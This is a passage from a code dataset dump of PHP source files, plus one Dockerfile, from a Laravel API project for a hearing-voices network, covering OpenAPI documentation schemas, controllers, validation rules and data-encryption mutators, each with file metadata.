"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass PaginationSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @param \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema|null $schema\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null, Schema $schema = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::array('data')->items($schema),\n Schema::object('meta')->properties(\n Schema::integer('current_page'),\n Schema::integer('from'),\n Schema::integer('last_page'),\n Schema::string('path'),\n Schema::integer('per_page'),\n Schema::integer('to'),\n Schema::integer('total')\n ),\n Schema::object('links')->properties(\n Schema::string('first'),\n Schema::string('last'),\n Schema::string('prev'),\n Schema::string('next')\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6470588445663452,
"alphanum_fraction": 0.6480908393859863,
"avg_line_length": 29.28125,
"blob_id": "a5fb665c2305affc30b3dc45098b6cdb7530cb2b",
"content_id": "111c19b52dc0982a5734a7d795317d01e151cbee",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 969,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 32,
"path": "/app/Docs/Paths/EndUsers/EndUsersMePath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\EndUsers;\n\nuse App\\Docs\\Operations\\EndUser\\ShowEndUserOperation;\nuse App\\Docs\\Utils;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass EndUsersMePath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/end-users/me')\n ->operations(\n ShowEndUserOperation::create()\n ->summary('Got the authenticated end user')\n ->description(\n Utils::operationDescription([EndUser::class])\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7138047218322754,
"alphanum_fraction": 0.7171717286109924,
"avg_line_length": 20.214284896850586,
"blob_id": "9c43702491755cba00cb220d81952f5485109942",
"content_id": "d23c9857fa7661e38122c1eda92ae2acd63e662b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 297,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 14,
"path": "/app/VariableSubstitution/VariableSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution;\n\ninterface VariableSubstituter\n{\n /**\n * @param string $content The entire content including variables that need substituting\n * @return string|null\n */\n public function substitute(string $content): ?string;\n}\n"
},
{
"alpha_fraction": 0.6528662443161011,
"alphanum_fraction": 0.6536624431610107,
"avg_line_length": 25.16666603088379,
"blob_id": "5446c418d359300117353ce8fedb916292f3ca15",
"content_id": "d3931b04da009913194f2133fe56f843b6022cc7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1256,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 48,
"path": "/app/Services/ExportService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Export\\ExportRequested;\nuse App\\Exceptions\\ExporterNotFoundException;\nuse App\\Exceptions\\InvalidExporterException;\nuse App\\Exporters\\BaseExporter;\nuse App\\Models\\Admin;\nuse App\\Models\\Export;\nuse Illuminate\\Support\\Str;\n\nclass ExportService\n{\n /**\n * @param string $type\n * @param \\App\\Models\\Admin $admin\n * @param string $exporterNamespace\n * @throws \\Illuminate\\Contracts\\Filesystem\\FileNotFoundException\n * @return \\App\\Models\\Export\n */\n public function create(\n string $type,\n Admin $admin,\n string $exporterNamespace = 'App\\\\Exporters'\n ): Export {\n $exportClass = sprintf('%s\\\\%sExporter', $exporterNamespace, Str::studly($type));\n\n if (!class_exists($exportClass)) {\n throw new ExporterNotFoundException($exportClass);\n }\n\n if (!is_subclass_of($exportClass, BaseExporter::class)) {\n throw new InvalidExporterException($exportClass);\n }\n\n /** @var \\App\\Exporters\\BaseExporter $exporter */\n $exporter = new $exportClass();\n\n $export = $exporter->exportFor($admin);\n\n event(new ExportRequested($export));\n\n return $export;\n }\n}\n"
},
{
"alpha_fraction": 0.5592747330665588,
"alphanum_fraction": 0.5774058699607849,
"avg_line_length": 25.55555534362793,
"blob_id": "b2013957cc720faa6c33885f9f70d8e43cc534a1",
"content_id": "272a085cb170b8b623344217ac42a3ac9eb5a925",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 717,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 27,
"path": "/app/Http/Requests/Admin/StoreAdminRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Admin;\n\nuse App\\Rules\\Password;\nuse App\\Rules\\UkPhoneNumber;\nuse Illuminate\\Foundation\\Http\\FormRequest;\n\nclass StoreAdminRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'name' => ['bail', 'required', 'string', 'max:255'],\n 'phone' => ['bail', 'required', 'string', 'max:255', new UkPhoneNumber()],\n 'email' => ['bail', 'required', 'email', 'max:255', 'unique:users'],\n 'password' => ['bail', 'required', 'string', 'max:255', new Password()],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6770833134651184,
"alphanum_fraction": 0.6875,
"avg_line_length": 8.600000381469727,
"blob_id": "381d4163e76b9ab114601ca881c8b722aaffc798",
"content_id": "ca00a688f8f0570cb6c5fbe836302acd8ac02441",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 96,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/AuditMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait AuditMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6901798248291016,
"alphanum_fraction": 0.6929460763931274,
"avg_line_length": 24.821428298950195,
"blob_id": "48aa65897e8f72859569421ede6f804e04a02619",
"content_id": "98a0f059a6ac120476ef97098c0cf49516435eb9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 723,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 28,
"path": "/app/Http/Controllers/V1/File/DownloadController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\File;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Requests\\File\\DownloadFileRequest;\nuse App\\Models\\File;\n\nclass DownloadController extends ApiController\n{\n /**\n * @param \\App\\Http\\Requests\\File\\DownloadFileRequest $request\n * @param \\App\\Models\\File $file\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\App\\Models\\File\n */\n public function __invoke(DownloadFileRequest $request, File $file): File\n {\n $this->authorize('download', $file);\n\n event(EndpointInvoked::onRead($request, \"Downloaded file [{$file->id}].\"));\n\n return $file;\n }\n}\n"
},
{
"alpha_fraction": 0.6176176071166992,
"alphanum_fraction": 0.6186186075210571,
"avg_line_length": 21.704545974731445,
"blob_id": "a776709ad4ba819d90f736200673ffbaec0589f3",
"content_id": "937136f6be9390725b53f0919bc87130448fa492",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 999,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 44,
"path": "/app/Models/Mutators/ContributionMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait ContributionMutators\n{\n /**\n * @param string $content\n * @return string\n */\n public function getContentAttribute(string $content): string\n {\n return decrypt($content);\n }\n\n /**\n * @param string $content\n */\n public function setContentAttribute(string $content): void\n {\n $this->attributes['content'] = encrypt($content);\n }\n\n /**\n * @param string|null $changesRequests\n * @return string|null\n */\n public function getChangesRequestsAttribute(?string $changesRequests): ?string\n {\n return is_string($changesRequests) ? decrypt($changesRequests) : null;\n }\n\n /**\n * @param string $changesRequests\n */\n public function setChangesRequestsAttribute(string $changesRequests): void\n {\n $this->attributes['changes_requested'] = is_string($changesRequests)\n ? encrypt($changesRequests)\n : null;\n }\n}\n"
},
{
"alpha_fraction": 0.5936863422393799,
"alphanum_fraction": 0.5947046875953674,
"avg_line_length": 24.179487228393555,
"blob_id": "d4b01bb64a65f99d87e2dab7c453694437d29f7a",
"content_id": "2c1aba8f2658265d4221b92f8d423c3c9dbfc531",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 982,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 39,
"path": "/database/migrations/2019_05_29_110102_create_settings_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateSettingsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('settings', function (Blueprint $table): void {\n $table->string('key');\n $table->json('value');\n $table->boolean('is_private');\n });\n\n $settingsPath = realpath(dirname(__DIR__)) . '/storage/settings.json';\n $settings = json_decode(file_get_contents($settingsPath), true);\n foreach ($settings as &$setting) {\n $setting['value'] = json_encode($setting['value']);\n }\n\n DB::table('settings')->insert($settings);\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('settings');\n }\n}\n"
},
{
"alpha_fraction": 0.5694581270217896,
"alphanum_fraction": 0.5822660326957703,
"avg_line_length": 28.852941513061523,
"blob_id": "c8c3b463f17802e664bb7b3cd286386b0bdf771a",
"content_id": "25b6720d54c6890538b2e0d33cbeb6f1e734a20f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1015,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 34,
"path": "/app/Http/Resources/NotificationResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\Notification $resource\n */\nclass NotificationResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n return [\n 'id' => $this->resource->id,\n 'admin_id' => $this->resource->user->admin->id ?? null,\n 'end_user_id' => $this->resource->user->endUser->id ?? null,\n 'channel' => $this->resource->channel,\n 'recipient' => $this->resource->recipient,\n 'content' => $this->resource->content,\n 'sent_at' => optional($this->resource->sent_at)->toIso8601String(),\n 'created_at' => $this->resource->created_at->toIso8601String(),\n 'updated_at' => $this->resource->updated_at->toIso8601String(),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6484257578849792,
"alphanum_fraction": 0.6491754055023193,
"avg_line_length": 30.761905670166016,
"blob_id": "a91e0ded4869ba64447ed0eaa5c5c6a9fd03d120",
"content_id": "a0588c1931febc4998e540834b8edd7527fc7b7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1334,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 42,
"path": "/app/Docs/Operations/Audits/ShowAuditOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Audits;\n\nuse App\\Docs\\Schemas\\Audit\\AuditSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\AuditsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowAuditOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific audit')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(AuditsTag::create())\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, AuditSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6234618425369263,
"alphanum_fraction": 0.62428218126297,
"avg_line_length": 31.078947067260742,
"blob_id": "264ea8ed2ccd8a7d03aef9eaa4344f6141ed6967",
"content_id": "ff2362b3289513daafc28fec458f241a7d969903",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1219,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 38,
"path": "/app/Docs/Paths/Exports/ExportsRequestPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Exports;\n\nuse App\\Docs\\Operations\\Export\\RequestExportOperation;\nuse App\\Exporters\\AllExporter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass ExportsRequestPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/exports/{type}/request')\n ->parameters(\n Parameter::path()\n ->name('type')\n ->description('The type of export you want')\n ->schema(\n Schema::string()->enum(AllExporter::type())\n )\n ->required()\n )\n ->operations(\n RequestExportOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6618037223815918,
"alphanum_fraction": 0.663129985332489,
"avg_line_length": 18.842105865478516,
"blob_id": "d1147b066ea0ce266929bc3be0d5ac46bc165f55",
"content_id": "351c22ca3de8e7a4bfa8286e2b24ac8398111d3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 754,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 38,
"path": "/app/Events/Setting/SettingsUpdated.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Setting;\n\nuse Illuminate\\Database\\Eloquent\\Collection;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass SettingsUpdated\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\Illuminate\\Database\\Eloquent\\Collection\n */\n protected $settings;\n\n /**\n * SettingCreated constructor.\n *\n * @param \\Illuminate\\Database\\Eloquent\\Collection $settings\n */\n public function __construct(Collection $settings)\n {\n $this->settings = $settings;\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Collection\n */\n public function getSetting(): Collection\n {\n return $this->settings;\n }\n}\n"
},
{
"alpha_fraction": 0.5630573034286499,
"alphanum_fraction": 0.5681528449058533,
"avg_line_length": 18.625,
"blob_id": "f42b0475857a74c6e4fc53e0ad1be89464fff66c",
"content_id": "fb6283c973d02b8ab9977c161e3a2ee71ecff3b3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 785,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 40,
"path": "/app/Rules/Words.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Rules;\n\nuse Illuminate\\Contracts\\Validation\\Rule;\n\nclass Words implements Rule\n{\n protected const WORD_LIMIT = 700;\n\n /**\n * Determine if the validation rule passes.\n *\n * @param string $attribute\n * @param string $string\n * @return bool\n */\n public function passes($attribute, $string): bool\n {\n $words = explode(' ', $string);\n $words = array_filter($words);\n\n return count($words) <= static::WORD_LIMIT;\n }\n\n /**\n * Get the validation error message.\n *\n * @return string\n */\n public function message(): string\n {\n return sprintf(\n 'The :attribute must have no more than %d words.',\n static::WORD_LIMIT\n );\n }\n}\n"
},
{
"alpha_fraction": 0.569926381111145,
"alphanum_fraction": 0.5709779262542725,
"avg_line_length": 28.71875,
"blob_id": "c7b5b2a4468317ac6ad94f675b63916f7c3a6b7c",
"content_id": "e3abeaf24cd1e4bc05adceb3457b6cdc013b460a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 951,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 32,
"path": "/app/Docs/Schemas/Admin/AdminSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Admin;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass AdminSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('id')\n ->format(static::FORMAT_UUID),\n Schema::string('name'),\n Schema::string('phone'),\n Schema::string('email'),\n Schema::string('created_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('updated_at')\n ->format(static::FORMAT_DATE_TIME)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6770833134651184,
"alphanum_fraction": 0.6875,
"avg_line_length": 8.600000381469727,
"blob_id": "6637821729f4abd9c546c9d921302667bcd43f03",
"content_id": "4eabcf88e9767b0904206ca257852dd9df08f04b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 96,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/AdminMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait AdminMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6122449040412903,
"alphanum_fraction": 0.612863302230835,
"avg_line_length": 32.6875,
"blob_id": "672e7f214f8df41b4d31980a1c056571a3e8214a",
"content_id": "ec350f6913bd0920b884e02b31cd2ed9019a3b29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1617,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 48,
"path": "/app/Docs/Operations/EndUser/DestroyEndUserOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\EndUser;\n\nuse App\\Docs\\Responses\\ResourceDeletedResponse;\nuse App\\Docs\\Tags\\EndUsersTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass DestroyEndUserOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_DELETE)\n ->summary('Delete a specific end user')\n ->description(\n Utils::operationDescription(\n [Admin::class, EndUser::class],\n <<<'EOT'\n * If an end user is making the request, then they can only delete their own\n end user resource.\n EOT\n )\n )\n ->tags(EndUsersTag::create())\n ->parameters(\n Parameter::query()->name('type')->required()->schema(\n Schema::string()->enum('soft_delete', 'force_delete')\n )\n )\n ->responses(\n ResourceDeletedResponse::create(null, 'end user')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5417193174362183,
"alphanum_fraction": 0.5423514246940613,
"avg_line_length": 19.8157901763916,
"blob_id": "73a183288e9f4ccff1acd5860a0e93e748ed70e3",
"content_id": "c18cba649a482b95e0463a7884f6e5878811b48e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1582,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 76,
"path": "/app/Rules/ValidFileToken.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Rules;\n\nuse App\\Models\\Admin;\nuse App\\Models\\File;\nuse App\\Models\\FileToken;\nuse Illuminate\\Contracts\\Validation\\Rule;\n\nclass ValidFileToken implements Rule\n{\n /**\n * @var \\App\\Models\\File\n */\n protected $file;\n\n /**\n * @var \\App\\Models\\Admin|null\n */\n protected $admin;\n\n /**\n * ValidFileToken constructor.\n *\n * @param \\App\\Models\\File $file\n * @param \\App\\Models\\Admin|null $admin\n */\n public function __construct(File $file, ?Admin $admin)\n {\n $this->file = $file;\n $this->admin = $admin;\n }\n\n /**\n * Determine if the validation rule passes.\n *\n * @param string $attribute\n * @param string $token\n * @return bool\n */\n public function passes($attribute, $token): bool\n {\n // Don't bother checking for public files.\n if ($this->file->isPublic()) {\n return true;\n }\n\n // If the user is not an admin then fail.\n if ($this->admin === null) {\n return false;\n }\n\n /** @var \\App\\Models\\FileToken $token */\n $token = FileToken::find($token);\n\n // If the file token is invalid, then fail.\n if ($token === null) {\n return false;\n }\n\n // Pass if the token is valid for the admin.\n return $token->isValid($this->admin);\n }\n\n /**\n * Get the validation error message.\n *\n * @return string\n */\n public function message(): string\n {\n return 'The :attribute must be valid.';\n }\n}\n"
},
{
"alpha_fraction": 0.6058683395385742,
"alphanum_fraction": 0.6062648892402649,
"avg_line_length": 37.79999923706055,
"blob_id": "459760e9461e8d51acaeda4da93f3e23e7aefe35",
"content_id": "aa8066ccc6de73a3870637433108f4662dd9dd3f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2522,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 65,
"path": "/app/Docs/Operations/Audits/IndexAuditOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Audits;\n\nuse App\\Docs\\Parameters\\FilterParameter;\nuse App\\Docs\\Parameters\\PageParameter;\nuse App\\Docs\\Parameters\\PerPageParameter;\nuse App\\Docs\\Parameters\\SortParameter;\nuse App\\Docs\\Schemas\\Audit\\AuditSchema;\nuse App\\Docs\\Schemas\\PaginationSchema;\nuse App\\Docs\\Tags\\AuditsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass IndexAuditOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all audits')\n ->description(\n Utils::operationDescription(\n [Admin::class],\n 'Audits are returned in descending order of the `created_at` field.'\n )\n )\n ->tags(AuditsTag::create())\n ->parameters(\n PageParameter::create(),\n PerPageParameter::create(),\n FilterParameter::create(null, 'id')\n ->description('The IDs of the audits to filter by')\n ->schema(Schema::string())\n ->style(FilterParameter::STYLE_SIMPLE),\n FilterParameter::create(null, 'admin_id')\n ->description('The ID of an admin to filter by')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID)),\n FilterParameter::create(null, 'end_user_id')\n ->description('The ID of an end user to filter by')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID)),\n SortParameter::create(null, ['created_at'], '-created_at')\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n PaginationSchema::create(null, AuditSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5901495218276978,
"alphanum_fraction": 0.5910290479660034,
"avg_line_length": 25.44186019897461,
"blob_id": "fa08621bf1dfdf95bb187779c7a9d3a37311a10e",
"content_id": "3dce2f665f12246e62224a3603a728155921569d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1137,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 43,
"path": "/app/Http/Controllers/Auth/EndUser/ForgotPasswordController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\Auth\\EndUser;\n\nuse App\\Http\\Controllers\\WebController;\nuse Illuminate\\Contracts\\View\\View;\nuse Illuminate\\Foundation\\Auth\\SendsPasswordResetEmails;\n\nclass ForgotPasswordController extends WebController\n{\n /*\n |--------------------------------------------------------------------------\n | Password Reset Controller\n |--------------------------------------------------------------------------\n |\n | This controller is responsible for handling password reset emails and\n | includes a trait which assists in sending these notifications from\n | your application to your users. Feel free to explore this trait.\n |\n */\n\n use SendsPasswordResetEmails;\n\n /**\n * ForgotPasswordController constructor.\n */\n public function __construct()\n {\n $this->middleware('guest:web');\n }\n\n /**\n * Display the form to request a password reset link.\n *\n * @return \\Illuminate\\Contracts\\View\\View\n */\n public function showLinkRequestForm(): View\n {\n return view('end-user.auth.forgotten-password');\n }\n}\n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7211740016937256,
"avg_line_length": 22.850000381469727,
"blob_id": "2dd1f2850a686572671ebb8b11e9f77e7462175d",
"content_id": "1ed86ce6f6a12470165853e337d5950498ddcf83",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 477,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 20,
"path": "/docker/troposphere/Dockerfile",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# Set base image.\nFROM python:3.7-slim\n\n# Set maintainer to Ayup Digital.\nLABEL maintainer=\"Ayup Digital\"\n\n# Set the working directory to the project root.\nWORKDIR /tmp\n\n# Install generic software.\nRUN apt-get -qq update \\\n && apt-get install -y build-essential libssl-dev groff \\\n && rm -rf /var/lib/apt/lists/*\n\n# Copy and install the Python dependency requirements.\nCOPY requirements.txt .\nRUN pip install -r requirements.txt\n\n# Set default command.\nCMD [\"pip\", \"freeze\"]\n"
},
{
"alpha_fraction": 0.5128676295280457,
"alphanum_fraction": 0.5257353186607361,
"avg_line_length": 16.54838752746582,
"blob_id": "780fdbeec1ae947f5802644eda39f40a1aa95f9c",
"content_id": "74c89ecb9e4b0c292a551d4e91ac0c5055e94596",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 544,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 31,
"path": "/app/Exporters/AllExporter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
